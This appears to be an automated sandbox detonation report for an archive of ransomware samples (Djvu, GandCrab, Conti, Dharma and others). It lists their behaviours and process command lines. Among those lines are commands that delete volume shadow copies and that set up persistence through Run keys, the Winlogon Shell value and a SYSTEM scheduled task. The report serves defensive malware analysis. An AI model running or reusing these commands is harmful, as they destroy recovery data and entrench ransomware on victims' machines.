Analysis Overview
SHA256
e876044c37cc3f095ae06e90abf8c4acf3f51e8073e07f8db8d7759d5979830b
Threat Level: Known bad
The file RNSM00467.7z was found to be: Known bad.
Malicious Activity Summary
Djvu Ransomware
Conti Ransomware
Gandcrab
GandCrab payload
Remcos
Detected Djvu ransomware
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Modifies Windows Firewall
Identifies Wine through registry keys
Checks BIOS information in registry
Checks computer location settings
Loads dropped DLL
Executes dropped EXE
Modifies file permissions
Obfuscated with Agile.Net obfuscator
Adds Run key to start application
Uses Tor communications
Looks up external IP address via web service
UPX packed file
Hide Artifacts: Hidden Files and Directories
Detects Pyinstaller
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Program crash
Scheduled Task/Job: Scheduled Task
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Views/modifies file attributes
Suspicious behavior: GetForegroundWindowSpam
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Uses Volume Shadow Copy service COM API
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-02 18:14
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-02 18:14
Reported
2024-10-02 18:17
Platform
win10v2004-20240802-en
Max time kernel
82s
Max time network
142s
Command Line
Signatures
Conti Ransomware
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
GandCrab payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gandcrab
Remcos
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00467\smss.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.pef-398005e44ca0d46567f084c984785936d42e4f4681c69412a30cce99b97c4fce.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec885ee82b9ab2f53977d7abcff342deebad924ef365f316047206cf9c75930d.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Wine | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\rundll32.exe" | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec885ee82b9ab2f53977d7abcff342deebad924ef365f316047206cf9c75930d.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\virus = "C:\\Users\\Admin\\Desktop\\00467\\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe" | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Uses Tor communications
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-GTKFH.tmp\Setup.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00467.7z
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00467.7z"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /1
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-22078d12aebf61239184da2dcf6462bc4b2a18e0a78a0d06f393f7a56a57ea66.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-22078d12aebf61239184da2dcf6462bc4b2a18e0a78a0d06f393f7a56a57ea66.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-23b8ae84b0edc8f3e97582280a2cc11010f3f8dbc3a9bb79f393cb89566c239d.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-23b8ae84b0edc8f3e97582280a2cc11010f3f8dbc3a9bb79f393cb89566c239d.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-2bc7e232f0a3b4fd35fe3c374dc94004a552fc9104115bd5a3801ebec3ecfac3.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-2bc7e232f0a3b4fd35fe3c374dc94004a552fc9104115bd5a3801ebec3ecfac3.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec885ee82b9ab2f53977d7abcff342deebad924ef365f316047206cf9c75930d.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec885ee82b9ab2f53977d7abcff342deebad924ef365f316047206cf9c75930d.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe
HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Encoder.gen-fd1b69147cf3a8565c3c0079077d95652a81b041f3d1588ef2ef9b0fd5ab0e70.exe
HEUR-Trojan-Ransom.MSIL.Encoder.gen-fd1b69147cf3a8565c3c0079077d95652a81b041f3d1588ef2ef9b0fd5ab0e70.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\00467\hgfjgbnvbnfyvhjfcghbnftydeghdfhf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe
HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe
C:\Users\Admin\Desktop\00467\Setup.exe
"C:\Users\Admin\Desktop\00467\Setup.exe"
C:\Users\Admin\Desktop\00467\smss.exe
"C:\Users\Admin\Desktop\00467\smss.exe"
C:\Users\Admin\AppData\Local\Temp\is-GTKFH.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GTKFH.tmp\Setup.tmp" /SL5="$40446,6160288,227840,C:\Users\Admin\Desktop\00467\Setup.exe"
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.pef-398005e44ca0d46567f084c984785936d42e4f4681c69412a30cce99b97c4fce.exe
HEUR-Trojan-Ransom.Win32.Blocker.pef-398005e44ca0d46567f084c984785936d42e4f4681c69412a30cce99b97c4fce.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
"C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmod.gen-7fbeac1dca907f4c04fec45a1228c9277f03930355eeac30d101bbce7e2733de.exe
HEUR-Trojan-Ransom.Win32.Crypmod.gen-7fbeac1dca907f4c04fec45a1228c9277f03930355eeac30d101bbce7e2733de.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "exploreresi" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\exploreresi.exe"
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-edfe3f35441f8be60eaf3c05d8aef4a4fe3ef9e1f87888639004894e2add2621.exe
HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-edfe3f35441f8be60eaf3c05d8aef4a4fe3ef9e1f87888639004894e2add2621.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9142005D-2F1F-4DB8-8F0E-237525AC258B}'" delete
C:\Users\Admin\AppData\Local\Temp\rundll32.exe
"C:\Users\Admin\AppData\Local\Temp\rundll32.exe"
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe9c62db424aa7f463f26c4acb5fa457a0378463689d409d902461de2e253093.exe
HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe9c62db424aa7f463f26c4acb5fa457a0378463689d409d902461de2e253093.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-9af680c45a7f146176d9ea94ef7589544ef33ed88b78d4d0eec62e6b4ad55259.exe
HEUR-Trojan-Ransom.Win32.GandCrypt.gen-9af680c45a7f146176d9ea94ef7589544ef33ed88b78d4d0eec62e6b4ad55259.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-c79a2a45c5ed7e884911533a5be8fe17be60210705fd3925c1007fd12edfee10.exe
HEUR-Trojan-Ransom.Win32.GandCrypt.pef-c79a2a45c5ed7e884911533a5be8fe17be60210705fd3925c1007fd12edfee10.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Generic-12fe1a5cfbef5b40d33d1586096588188e2f88c30eb7e75ccea7b88b87f85462.exe
HEUR-Trojan-Ransom.Win32.Generic-12fe1a5cfbef5b40d33d1586096588188e2f88c30eb7e75ccea7b88b87f85462.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe
HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-7c32e79fe312e6e108f6be3312510888bc7a8a44722e842ee4eea679eedb6ed9.exe
HEUR-Trojan-Ransom.Win32.PolyRansom.gen-7c32e79fe312e6e108f6be3312510888bc7a8a44722e842ee4eea679eedb6ed9.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-aacbdfb0876945145eaed48ba7d407002931233f7fd2ed29d8d82c4acc15d50d.exe
HEUR-Trojan.MSIL.Crypt.gen-aacbdfb0876945145eaed48ba7d407002931233f7fd2ed29d8d82c4acc15d50d.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-b101bb78780fc065872cce7a311d65e3361d9c6b9c1191ef2b45535bf4bc71f1.exe
HEUR-Trojan.MSIL.Crypt.gen-b101bb78780fc065872cce7a311d65e3361d9c6b9c1191ef2b45535bf4bc71f1.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-bda16ef37fa055ac934e131acb824a54850d0a63cb2c56e24e7f9073336cdd43.exe
HEUR-Trojan.MSIL.Crypt.gen-bda16ef37fa055ac934e131acb824a54850d0a63cb2c56e24e7f9073336cdd43.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-cdc1cc9abef2cb170ec2e635b1e43541e89ebe5a68fc1e516f5d7a9759025bbb.exe
HEUR-Trojan.MSIL.Crypt.gen-cdc1cc9abef2cb170ec2e635b1e43541e89ebe5a68fc1e516f5d7a9759025bbb.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-d992f05972629a2764cd1b57abfb88c714647a86af9a017a9211b85e56a0c3e2.exe
HEUR-Trojan.MSIL.Crypt.gen-d992f05972629a2764cd1b57abfb88c714647a86af9a017a9211b85e56a0c3e2.exe
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "exploreresi" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\exploreresi.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6256 -ip 6256
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 6048 -ip 6048
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
.
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
C:\Users\Admin
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
C:\ProgramData
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
C:\Program Files (x86)
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
C:\Users\Admin\AppData\Roaming
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
\\DADDYSERVER
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 236
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9142005D-2F1F-4DB8-8F0E-237525AC258B}'" delete
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 480
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
